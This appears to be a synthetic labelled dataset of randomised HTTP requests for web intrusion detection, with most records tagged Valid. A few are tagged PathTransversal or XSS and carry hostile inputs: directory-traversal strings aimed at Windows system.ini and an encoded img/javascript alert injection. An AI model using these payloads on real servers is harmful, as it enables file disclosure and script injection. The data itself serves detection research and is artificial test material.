Upgrade: eswo/1.2, 2shets/0.9, Ic4/7.0
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 199.125.170.108
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8668
Start - Id: 34841
class: Valid
POST /rsnislsrkrvee.jpeg? HTTP/1.1
Content-Length: 12
Content-Language: dnthc
Content-Encoding: gzip
Content-Location: http://www.ge5noh.biz/b7fyc8/dlt5ajn2/idrphrsr/frNEre/mDye.rar
Content-MD5: VmFzcGFlR3J0bzRzNmExZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Mar 08 08:46:00 GMT
Last-Modified: Fri, 02 Feb 07 10:48:44 GMT
Host: www.imfitlCeo.com
Connection: aOoaye
Accept: */*
Accept-Charset: iso-8859-6, x-mac-roman
Accept-Encoding: compress;q=0.2, gzip;q=0.6, deflate, deflate;q=0.9, compress
Accept-Language: 4dtue-Au
Cache-Control: to='dfeSie'
Client-ip: 16.40.155.255
Cookie: dauayrrieedtoaa=awpv7Raq;eeentene6v=snl1waarl c1
Cookie2: $Version="351"
Date: Fri, 20 Feb 09 03:23:45 UTC
ETag: W/"7An7aeT8x-TeZUSw2"
Expect: sgm8uo=A5aet9i
From: RtMDosh@STsWZttr.de
If-Modified-Since: Sat, 12 Dec 09 14:37:59 CET
If-Unmodified-Since: Thu, 15 Apr 10 21:53:27 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Jun 05 23:44:18 UTC
Max-Forwards: 75
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest response="56FFddd048DB85AF437AF9E1cF7F3afc"
Authorization: NTLM ZnhiODV0YWVwbElkdHdXdXpxOVJjQm5pMHRIaXR3ZXRlYXJsNG5hZWw=
Range: 623768-8270,-361888,-69728
Referer: /besac.exe
TE: trailers,trailers,chunked
Trailer: Cache-Control
User-Agent: ntesbae4o (3e2IoG)
UA-CPU: x86
UA-Disp: 9904,9912,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3246x5463
Via: 2.4 145.191.48.180, 9.0 234.100.72.80, FTP/6.9 60.0.106.14
Transfer-Encoding: identity
Upgrade: iTroe/7.1, yYgPs/3.4
Warning: 029 www.ldelcm.jpg "mt7u16ipeiusedskeu1" 
X-Forwarded-For: 77.62.199.33
X-Serial-Number: 11691729475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rsiogd=04801

End - Id: 34841
Start - Id: 6869
class: Valid
POST /FD6Ig0dHAV2JQAa/m1rmtTi/erj7tpU3eh/yv68ghmsbnizniae2mei/iqXnTcLomutEl/dtKF/ogG9wV.TvfXrT1i/kc_vPr@6TsH/nLb263MopG1GJjPt/i6Q9fKWA9-KDnc/z6rDfTBjTt.JQUhsA87/jZ17W0aCxCnYBFrA62h.js? HTTP/1.1
Content-Length: 78
Content-Language: twrr,re,hEoes4t
Content-Encoding: identity
Content-Location: /hrTeleni/Uldutee/lirpf.dll
Content-MD5: b0lzZm94bnR1YUFFb05hdw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Mar 05 04:35:35 CET
Last-Modified: Sat, 17 Jan 04 07:46:02 UTC
Host: 100.109.180.115
Connection: keep-alive
Accept: video/*, image/*;q=0.7, image/gif
Accept-Charset: windows-1257;q=0.5, hz-gb-2312;q=0.5, iso-8859-7, euc-tw;q=0.2
Accept-Encoding: *
Accept-Language: t-erhatoxd, rxfia3t5-w, ostucEt-daa, ozJum-Kt
Cache-Control: no-store
Client-ip: 35.121.149.125
Cookie: tNT=0swnicsfn5;telnetBIrHinclude=nxDqGEjA68V;Ajh=aZesxn;iynu8hrcrlot2=4fr ~aned8a
Cookie2: $Version="97"
Date: Thu, 19 Apr 07 02:27:16 GMT
ETag: "-MT3jkXOxOSTjVXc6Zps"
Expect: yC9puyen
From: 1m1ll@ibidpns.org
If-Modified-Since: Thu, 03 Feb 05 15:55:10 UTC
If-Unmodified-Since: Mon, 14 Mar 05 18:52:06 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Apr 05 16:10:11 CET
Max-Forwards: 36
MIME-Version: 1.0
Pragma: 9='cflNro'
Proxy-Authorization: Digest uri=http://nsa5.net/jIlhTi.rar
Authorization: Yxtuni stlefxty=rdmt0sm
Range: 59192-,5736-40
Referer: /Aqseoat0/ipepe/8e2eB.pl
TE: chunked;q=0.0,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.5 (compatible; Konqueror/9.4; Mac OS X; 5tes; estheg; EevanMin)
UA-CPU: x86
UA-Disp: 143,8998,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 677x984
Via: 1.2 223.5.117.39
Transfer-Encoding: compress
Upgrade: wJoe/9.4, csik/4.7, njsNtm/6.0
Warning: 555 211.4.195.97 "hHaodm" 
X-Forwarded-For: 39.123.84.227
X-Serial-Number: 22207234
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ahenrrofnj=01&ehndtroyive=w ?mlscripteni5(h&Ld7ydexint7y=45izlo&rcS=952405

End - Id: 6869
Start - Id: 23212
class: Valid
GET /ckd6c8KfK/ooDryieavilhe/tY./aeUiwois2htoeo/eGRnacyprde.shtml?nye3nu4Tee=25&Gusdv2Nb=86979&wq=1561 HTTP/1.1
Host: www.aruntmhroa.biz
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-2;q=0.2, iso-8859-6, x-mac-turkish;q=0.4
Accept-Encoding: *
Accept-Language: etTcsh-esexyosh, oax-tlB
Cache-Control: rsua=mf
Client-ip: 12.26.245.169
Cookie: Mvtd4nNihcMmmsr=traletoet
Cookie2: $Version="382"
Date: Wed, 19 Oct 05 21:28:47 CET
ETag: W/"ett5X5q..RGOZQdld"
Expect: 100-continue
From: prra@pwbtk.it
If-Modified-Since: Sun, 21 Jan 07 13:29:05 CET
If-Unmodified-Since: Sun, 18 Jan 04 05:41:14 GMT
If-Match: *
If-None-Match: "yl0lWQ3LEjuSFM01X5"
If-Range: "KUNESN9kgVJ8VHL1R"
Max-Forwards: 060
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZU9lY2c6ZG9lZQ==
Range: -30,07-2
Referer: http://www.Aeme36.net/epte8/dSgmpi.cfm
TE: deflate;q=0.4,trailers
Trailer: If-None-Match
User-Agent: vagali4 (qAV_L4; e2gJizx; eKHUPe; drP0ZSvU)
UA-CPU: PowerPC
UA-Disp: 1015,816,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 973x7584
Via: 8.3 www.prmas.jpg, 1.1 130.132.92.164, 6.9 www.0eat.tiff:33
Transfer-Encoding: identity
Upgrade: enbe/7.1, 5nea/2.6, bie0n/5.7, ueru/7.3
Warning: 740 67.56.178.182:495 "aadiohcwejjhwee" 
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 9726059
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23212
Start - Id: 45657
class: PathTransversal
GET /eq85iM/92@U2sGVsEvkUwN/0ers/lI7tzBpQ9mVhjDrCl9/xM.SBZvItSmu0Q/ncaM5Fq6/ojt.png?KTjZbFinserter=sg+shutdown&dyHoCbi=ipb3saqu&mheiwulhzi0h=pst&eDd3s2ni=ihorRsicbo&tdnrteehsegiboa=063&8ewindow.openJV4=%5CWINNT%5Csystem.ini HTTP/1.0
Host: 230.172.187.76:3310
Connection: in6r
Accept: video/*;q=0.6
Accept-Charset: x-mac-greek, iso-8859-7, isiri-3342;q=0.6
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 37.166.87.242
Cookie: cactibeioyynkpf=9408973;tihIe=92979321
Cookie2: $Version="46"
Date: Mon, 23 Feb 09 24:31:11 UTC
ETag: W/"m.6STWsqpMYQfO5"
Expect: 100-continue
From: waaAi@m8ebbshnen.org
If-Modified-Since: Wed, 03 Mar 04 19:06:46 GMT
If-Unmodified-Since: Fri, 24 Dec 04 16:52:50 GMT
If-Match: "w6At@Pqt6aQd3CsN6"
If-None-Match: "3BwnbX3K7XCmn.xh44"
If-Range: "PAA3Ys3l0qu2BAXi"
Max-Forwards: 81
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: NTLM V2FscmdtaW9sb2FkYWFoZ05FcnNlbkhqYXJwTG8zakEz
Authorization: Digest cnonce="frhihrn"
Range: -32,-46611
Referer: /6wrnaA9e/is12tew/s5Scn7t.swf
TE: trailers,chunked;q=0.0
Trailer: Cache-Control
User-Agent: rolCthfu/3.8
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 822x7787
Via: HTTP/0.2 www.ctwsqwsd.html, 0.0 www.snibRf.png:0
Transfer-Encoding: gzip
Upgrade: xEsdx/9.1, igRd/3.6, uactmt/9.2, dwr7p/4.6
Warning: 878 36.126.187.244:5468 "Nwnmte1bhOIhe" 
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45657
Start - Id: 18214
class: Valid
GET /gIhQaL8dzeBwy-w8A/SH/tAJv-dCSz9/@WpnodeD/2Lw_Zz/milcettduymse/wT2@QKcM2A_vw5dl3LQr.gif?wX-7enjHJb=yyeb%2B&tF2tVTHn=leien+1eUge&Lsseaae5y7tfCt=fki&BSCcBh=dhy7stvloyaovjGn5&in76YQOObf.Y=dWk1&TGZoN548winntiYZ=30821&Homhaaetswra5=ouS-j&trOcaatt=1119796&Ilxq=307833&son=32&Rb5c=9&ytaleadiS29=sem&lysyifriNeqfbf=y&5Hcs%ue_wZhmH=r38cczQ%40e3 HTTP/1.1
Host: 102.137.87.152:80
Connection: keep-alive
Accept: text/*;q=0.2, image/gif;q=0.8
Accept-Charset: cp-936
Accept-Encoding: 
Accept-Language: jowce-dH7;q=0.2, cli-andeoesd;q=0.1, nbbhep-o;q=0.5, eri7ietS-i, on9eEO-sabszrEt
Cache-Control: no-store
Client-ip: 18.171.181.243
Cookie: intnnLweraec=eic;wEKDiutfantttn=\TtAbdgni
Cookie2: $Version="251"
Date: Sun, 14 May 06 09:09:35 UTC
ETag: W/"kbsG2wxTIYHzOzT-h"
Expect: shsz
From: 1rhtah@f5rw.de
If-Modified-Since: Tue, 01 Jun 04 16:04:57 UTC
If-Unmodified-Since: Wed, 23 Nov 05 18:29:26 UTC
If-Match: "a-UpP4DP8B.sUFU_Ymhe"
If-None-Match: *
If-Range: *
Max-Forwards: 7607
MIME-Version: 0.5
Pragma: saey='qee3ytn'
Proxy-Authorization: udkE o8jpteaz=eet8ehdn
Authorization: NTLM aXNhY29lYW90T3JvaXQyTWhlcmF6ZWV0N2U5dG5iczl0UmU5NnJybw==
Range: 27-4,-74
Referer: http://www.cdmpkia.biz/xfdcMtAh/wTesfaa1.exe
TE: trailers,deflate;q=0.8
Trailer: Trailer
User-Agent: Rmos (oFk4jh; ug7N4l)
UA-CPU: PowerPC
UA-Disp: 202,576,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 810x317
Via: FTP/4.5 127.200.48.227
Transfer-Encoding: identity
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 457 249.243.123.227 "ar3gutfzh" "Thu, 05 Jul 07 12:26:34 GMT"
X-Forwarded-For: 164.38.194.242
X-Serial-Number: 8413753908190
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18214
Start - Id: 30313
class: Valid
GET /sHpE5hM0_J.nsf?aaht2fq5t6uto=jN7%40fQoWu8N&tVsAnoeCrw7=eeeEgskEnimrys&IDqz=256442283 HTTP/1.1
Host: 135.67.129.24:49
Connection: aaubeir
Accept: */*
Accept-Charset: euc-cn;q=0.2, windows-1255;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: S-tmn4;q=0.9, vp-ao, 9-e;q=0.6, hu-Pneba5
Cache-Control: min-fresh=28
Client-ip: 81.112.14.22
Cookie: wlviay2ussdw=tmppn;eet0ertoeno=xOadEednssA;cl_EXustylein=g-w
Cookie2: $Version="337"
Date: Fri, 17 Oct 08 05:30:55 CET
ETag: "tFguW.Bw5vNsgWNX6OO"
Expect: s6y6sbh=lOeoDn;oetxro
From: ujoeseZ@ns5idhma.net
If-Modified-Since: Thu, 22 Apr 10 05:19:45 UTC
If-Unmodified-Since: Tue, 06 Jan 04 01:41:04 CET
If-Match: *
If-None-Match: "P9x1HitwhdWFmep"
If-Range: "pwxBetCzKqldErSr"
Max-Forwards: 6
MIME-Version: 2.6
Pragma: jgan='rtnlv0o'
Proxy-Authorization: Digest algorithm=idsosvo
Authorization: NTLM ZXNpdHJuZWhpenRydG5lN2VUdmVkbXRlaG9uMXdvc2xyeXRpbzN0cA==
Range: 628-3564,6-,92222-5768
Referer: /ehgSb/opkeEd/eOisrak.avi
TE: trailers,gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/2.4 (X11; U; Open BSD i386 9.0; ys-he; rv:3.7.5) Gecko/94435481
UA-CPU: 68000
UA-Disp: 9919,2865,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3971x442
Via: xkd/2.8 195.189.211.95, FTP/2.7 201.213.227.255:45600, 5.4 www.ioarsimr.shtml
Transfer-Encoding: identity
Upgrade: hztley/9.7, peaeM/3.4, iwtar/8.7, 1Tzzin/0.9, roh/9.3
Warning: 088 www.endReiE.gif "eyoier6d" "Mon, 17 May 04 02:23:56 GMT"
X-Forwarded-For: 209.241.65.202
X-Serial-Number: 60742
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30313
Start - Id: 47647
class: XSS
GET /eWwoIQjI/aeguxelDopnnAibyi4a/drzsnEhiOaR6.cfm?dk=u%24hacceptaaEtf2&dtrcwnyey5si=lsgnph-kd%2Bw03js0dssstr&TincludecolTw0=%3Cimg+++++src+%3D++%22+javascript%3A+++%5Balert+%28%27aqt%27%29%3B%5D+%22+%3E&b2.6Z=80993&vdutce5aaaa=514&dueuOrodsltahto=a8lBoN HTTP/1.0
Host: 207.248.48.166
Connection: etllBilr
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress, compress, identity, identity
Accept-Language: *;q=0.0
Cache-Control: min-fresh=8693
Client-ip: 168.210.69.11
Cookie: pet=97458329;vsna3ou=uMOf;3nhdmw=Pi
Cookie2: $Version="06"
Date: Sat, 01 Oct 05 07:52:37 UTC
ETag: W/"KeyKdGthDghEQTc"
Expect: h7bew
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Thu, 01 Apr 10 02:33:43 UTC
If-Unmodified-Since: Mon, 06 Oct 08 12:31:28 UTC
If-Match: *
If-None-Match: "g0Nxp49zdnVaV17qXr1"
If-Range: *
Max-Forwards: 62
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest response="3e6AFcBd3DB6A9c456a7BdCF530D3E27"
Range: 51-,059585-
Referer: http://pi7xd.fr/Irmz3ali.txt
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: narngcsnc (yaWmVOv2E5; xO1yYLK; iAYbURDz)
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: soni/1.0 www.lqtsEi.js, 8.0 249.102.209.83
Transfer-Encoding: gzip
Upgrade: aeel/6.8, 8r7lst/5.1, dcuh/5.3, we7c9e/0.8
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47647
Start - Id: 6934
class: Valid
PUT /ao81acdiH9N-mu/cf4CL/i8/pKNT./umnn5etthrareylr/o2NF/agsp8yF9/zd_hPOGor8servicesgg/Knull/saiwwieelewoumalt/gdrRx2FdV5Rb8.htm? HTTP/1.0
Content-Length: 193
Content-Language: io
Content-Encoding: compress
Content-Location: http://www.rzwwol.uk/tEiNp/rpbstpyg.php3
Content-MD5: dXFmZW9zdHM1MnN5ZXhvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 May 07 01:28:22 GMT
Last-Modified: Fri, 08 Jul 05 24:34:41 UTC
Host: 197.217.85.195
Connection: heete
Accept: */*;q=0.4
Accept-Charset: euc-kr;q=0.6, iso-8859-1, windows-1258;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 182.144.239.94
Cookie: sa1obz=ia bs9roh\i c4c
Cookie2: $Version="44"
Date: Sun, 14 Jan 07 07:36:48 UTC
ETag: W/"cM-NnD.HISqaHlN2QGHe"
Expect: 100-continue
From: 9tasgo@r6haat.org
If-Modified-Since: Wed, 07 Apr 10 15:38:02 CET
If-Unmodified-Since: Wed, 04 Jul 07 02:45:29 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 22 Oct 07 22:29:50 UTC
Max-Forwards: 0
MIME-Version: 6.9
Pragma: ueat6e='ptoe'
Proxy-Authorization: obntn ETroq=muk2
Authorization: Basic Ym9UZzo1NG9hYjI=
Range: -35,310954-4,-65030
Referer: /eegf8eg7.avi
TE: trailers
Trailer: From
User-Agent: Mozilla/2.6 (compatible; MSIE 5.5; Win 9x; hescy)
UA-CPU: PowerPC
UA-Disp: 7932,0076,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9121x8354
Via: HTTP/9.1 212.73.118.26, 5.5 www.r3tis8r.jpg
Transfer-Encoding: identity
Upgrade: eRoin/5.2, vsm/1.5, to6a/3.8, h0t/3.0
Warning: 250 59.47.69.234 "dllcxoqieenmhiSaaaes" 
X-Forwarded-For: 26.141.211.211
X-Serial-Number: 95729667
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~

6Jyetn4ES=9132187&yehrreiaai5vmiD=ehyhhwnabhmu4Ea&73JFautoexecEgnWwp-=O8&nhiITem=a sDnrcprd&r2epbfmO=t]e7cdTde&iritnszl=n t(cmhtuhtDOr&jeeihRsiwnwcl=te&VErXWLrgzy4=h](5&iygebMMkaeE=3214

End - Id: 6934
Start - Id: 16711
class: Valid
GET /en6da0eykatmeeL/r1YQ9otWR2nRT9n/ryllimk83/4fpbgsoundz15-Rlhttps7ts/tevgnS76ZZe/oi/sf5/hN/oiEpx3a.jsp? HTTP/1.0
Host: 67.144.65.226
Connection: oeeAmd
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: E0l-enSoe, ort-ter8sga;q=0.7, Ln-sbpssO;q=0.1
Cache-Control: no-transform
Client-ip: 90.23.19.156
Cookie: erEnorretoh=eesaaerri;7H8V1L=lw4oS
Cookie2: $Version="706"
Date: Mon, 01 May 06 13:40:46 CET
ETag: "lU3lW.mlpvrUFxzvnDj"
Expect: 100-continue
From: o6botttt@Meerth.org
If-Modified-Since: Sat, 01 Dec 07 06:58:07 CET
If-Unmodified-Since: Fri, 24 Aug 07 20:02:41 GMT
If-Match: *
If-None-Match: *
If-Range: "Spn0SnVTZnxxdfVMG"
Max-Forwards: 5081
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM Y29kbXc0dXlob3VlZmVzcmQwZWFzdWhsaFJubm5oM2I1VGU=
Authorization: NTLM T3J5b2pkY2FpbmRUb2xUaWFzZWVwZWVlM2Fmc25zTWhnZWwwd05FbHVhag==
Range: 735-128151,-280736
Referer: http://www.0otnsa.cz/titcfsrt/tYp1u4e/aiyt05lj.mpeg
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.0 (compatible; Konqueror/9.6; Solaris; n3uoT; thopadro)
UA-CPU: x86
UA-Disp: 7604,2520,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 362x9602
Via: FTP/9.4 161.134.167.156:43285, 8.7 www.1fon.shtml, HTTP/0.0 www.inACso.tiff
Transfer-Encoding: 4b5s
Upgrade: wsgnwl/0.0, 7nltw/5.0, 7ai/7.4, rhRh/3.3, eMvtpm/2.1
Warning: 635 111.175.4.37 "odotyu1nei7D" 
X-Forwarded-For: 36.167.185.207
X-Serial-Number: 88173
----: ---------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 16711
Start - Id: 18998
class: Valid
GET /nbSobo/2G5OHg/tesm1izsyoRg/mnWxubBW1AIbN6p6ARk0.gif?semjunarfusaa=942483484&9ngaabw6sdnl=8&ltl6k7euo=1&rcyrosjnhrtirnr=oosb0fayWoda&xVGvBMs=evac1&ehiericsheij=49&es8=ia&r9mtdihbctt=ioheNhritncperlrs&t9Ua=ieaan&ts8=42&n3eiLIheec4e3=Oeedaavhefeoz%40a&e9LoiMe8tguces=e0&tfiawit5ds=i0u1A HTTP/1.0
Host: 212.14.7.194:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-japanese;q=0.9, iso-8859-6
Accept-Encoding: *;q=0.8
Accept-Language: swqMoi-eoLheht;q=0.0, ntseluyp-dhe5sae8;q=0.8
Cache-Control: no-store
Client-ip: 227.16.86.109
Cookie: nsptr=e;1UIobjectpJx8ZOy=nuoeaa6;dtirchgz=hdcQbjtdIt;0m7a=enYjed6LCe/eE;ottEa0smNRrLao5=s4Dmctmp;PZsdapngetrTi0=ledkE.B
Cookie2: $Version="3"
Date: Wed, 24 Dec 08 14:48:17 UTC
ETag: "v.fs8aP2gl-.Poow7ee2"
Expect: stppdeno
From: l14gyjst@isddra.be
If-Modified-Since: Tue, 21 Jul 09 15:51:35 CET
If-Unmodified-Since: Fri, 27 Aug 04 06:30:47 CET
If-Match: "Ld9u.KUisbrazHX5fF"
If-None-Match: "GX_S9rweC_cX44u9c@i"
If-Range: Sat, 21 Mar 09 10:16:49 UTC
Max-Forwards: 9
MIME-Version: 9.9
Pragma: dnltesa='n'
Proxy-Authorization: Digest username="elrscge"
Authorization: Digest nonce
Range: 2800-0168
Referer: http://www.nhE5.it/2etf/Oceoro/oesaeq/OUiKisdo.nsf
TE: trailers,deflate,gzip;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/0.5 (X11; U; SunOS sun4u 2.3; ho-sq; rv:2.1.7) Gecko/75848058
UA-CPU: 68000
UA-Disp: 655,4589,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 249x219
Via: FTP/4.6 www.srmeere.shtml, HTTP/9.1 www.iEaEem.jpg, FTP/7.9 124.231.228.165
Transfer-Encoding: ulxe; ncrci2aa=bO5wd
Upgrade: mdo/3.9, 9exzxd/7.0, aITo/3.5, pxaam/9.7, o7a9aw/0.4
Warning: 169 www.heannrye.js "iiewmgoohytygohEPot0" "Tue, 01 Feb 05 02:54:07 CET"
X-Forwarded-For: 227.198.34.58
X-Serial-Number: 27260320301
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18998
Start - Id: 45523
class: PathTransversal
GET /aqNjeFMla@z/os/un0ata5c8ilntoueXWe.mdb?zau=dmUPsaVah&wTj12ZXXp=8695556752&oIoioehheihra=p4n2djxz-&x6pieDb8aes=%24ewao&wotOneed7eho=etcnSz4nht&zltrtenoeyA=ghiht&uoaiie=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: www.dpteEt.uk:80
Connection: close
Accept: video/quicktime, image/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 228.114.110.173
Cookie: aeutest=omVT2;zsll=ilfBe;as8GaOulntashe=IB uc
Cookie2: $Version="953"
Date: Sat, 23 Jun 07 07:01:40 UTC
ETag: W/"JCTn_ojKBCwZqY_Co"
Expect: ngo6Mwsy
From: t2hldl05@oephweoTmr.de
If-Modified-Since: Mon, 12 Sep 05 23:21:41 UTC
If-Unmodified-Since: Mon, 01 Jun 09 09:15:42 GMT
If-Match: *
If-None-Match: *
If-Range: "kyyMREN6EzQuSys"
Max-Forwards: 88
MIME-Version: 5.3
Pragma: vsma='b7ie'
Proxy-Authorization: Digest username="o3nine"
Authorization: NTLM cFNyaGxyRWVobWlpbm9pcWlyY3VvYWVMamg4cmVJZFNlbkJsb2l0d3JlcjR6ZW0=
Range: 55569-482846
Referer: /ie5SAtXc/3mukt.mdb
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 6.4; os-fY; rv:8.7.6) Gecko/40848904
UA-CPU: 68000
UA-Disp: 1189,6667,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 441x867
Via: Rengoa/6.8 www.SEtegt.gif, 7.6 www.ieaaDi.css, HTTP/6.2 77.82.62.233
Transfer-Encoding: compress
Upgrade: h9ve/7.6, nhnh/8.9, ajSeht/4.1, arunr/6.8, hoib/8.4
Warning: 262 www.yptv0dez.html "oibr8oPRotpdsee8a7ax" "Fri, 17 Aug 07 06:53:24 UTC"
X-Forwarded-For: 55.26.191.205
X-Serial-Number: 2215888867609
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45523
Start - Id: 12839
class: Valid
GET /e-/iRnJUM@vggecMKZH18/x6jswl/thctnubtdaxdnnngeont/ikPGa_8SwIrckO14/63XNZs2j3is_PYFSt/Eu/iD5PUSuN2_cQ2/y2sesz49P2oyyTD9-32/Nb5HogxQgfGbody.dll?fcd=2&tbnzsel=rkkiRlYtr1dou&ahOeg2elNh5v=2&AVVtRwE=di%26i%3Deh+r HTTP/1.1
Host: 79.88.154.119
Connection: keep-alive
Accept: application/postscript
Accept-Charset: windows-1255;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 100.64.54.199
Cookie: slFdmshe=945346181;iTe3sdy=oYteot7el;zmochaFJXxH8tz=ts;bypi=aassrechhstsr3o;byNgad=tmd;yoatLes=ncLewe0aeHaamae9ts
Cookie2: $Version="875"
Date: Fri, 19 Jun 09 02:15:40 CET
ETag: "bgPzNMyNJ@_19U_S"
Expect: eAu4zu=rhyaebde
From: 8ajt@wTdgd.be
If-Modified-Since: Mon, 20 Jun 05 12:58:41 UTC
If-Unmodified-Since: Sun, 28 Jan 07 01:13:14 UTC
If-Match: "qvRIoej@xV2d0I9"
If-None-Match: "earKhfogxg1Thnh-l"
If-Range: *
Max-Forwards: 04
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic YmZlTzI6NmVlbWJsaWk=
Authorization: Basic YXRpZzptb2Jhc3Q0
Range: -27,-00780
Referer: http://www.bEeytb9t.st/wa3unoso/etto.zip
TE: trailers,gzip
Trailer: Authorization
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 9.2; ru-fa; rv:5.4.4) Gecko/90053734
UA-CPU: 68000
UA-Disp: 6911,855,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0320x5347
Via: HTTP/0.6 233.227.149.100, 7.6 19.132.102.94
Transfer-Encoding: identity
Upgrade: nhevnn/5.6, qd3g/2.0
Warning: 225 www.peosa.tiff "tlttga2nEbhemoU" "Thu, 19 Feb 04 19:47:02 CET"
X-Forwarded-For: 126.193.58.111
X-Serial-Number: 267270605384116
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12839
Start - Id: 28400
class: Valid
GET /uyHtouev/wxD0/eenTYtfPlop8da/r4DuscWuU/j5OggDst6ba/Vi0ApK7_passthru.jpg?bmtYboot.ini=973&ru1ndepl=44&7tmnos=e%3Da%2B0p&nidiesaujsldnho=1lrdc&atR1nzlTa=tsHzhifeeolel%27&7dih56nuF=connectdpsare3kShi&JE=%5D&sJeiok0=16&r6utssmE=7934195&m5eOlrxuh=7683733 HTTP/1.0
Host: 109.89.240.190
Connection: hzthnad
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tzpyi-ln
Cache-Control: mEisv=tlqi
Client-ip: 219.151.152.68
Cookie: raueRooe=(srt otS8enolog;d11QinPUzbQ=71;nyejLfr3ketper=4;onheefEtedrig=openo
Cookie2: $Version="142"
Date: Sat, 16 May 09 23:50:33 UTC
ETag: W/"bgp-f03GkjwIQx7"
Expect: wo7sdhm
From: oBcae9t@txO3eond.biz
If-Modified-Since: Mon, 14 Jul 08 15:48:02 UTC
If-Unmodified-Since: Sun, 12 Sep 04 17:55:30 UTC
If-Match: "l1qjiy7HisyNy17"
If-None-Match: *
If-Range: Fri, 01 Dec 06 06:51:16 GMT
Max-Forwards: 071
MIME-Version: 0.9
Pragma: o='zqadaCo'
Proxy-Authorization: Basic b3NtdDA6YW5mMmFvYXQ=
Authorization: NTLM YnR5bmNhdG1kd3Jhc3doaHQ1bXh3NGxmOXFsb2VyeHNhb3R3bGl0eWhlbg==
Range: 78-1826
Referer: /oeter/iust/klreg/t4nmeC5/caieinao.fgf
TE: chunked;q=0.9,trailers
Trailer: Via
User-Agent: oesesyrPwaq2d5h
UA-CPU: PowerPC
UA-Disp: 243,084,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1032x082
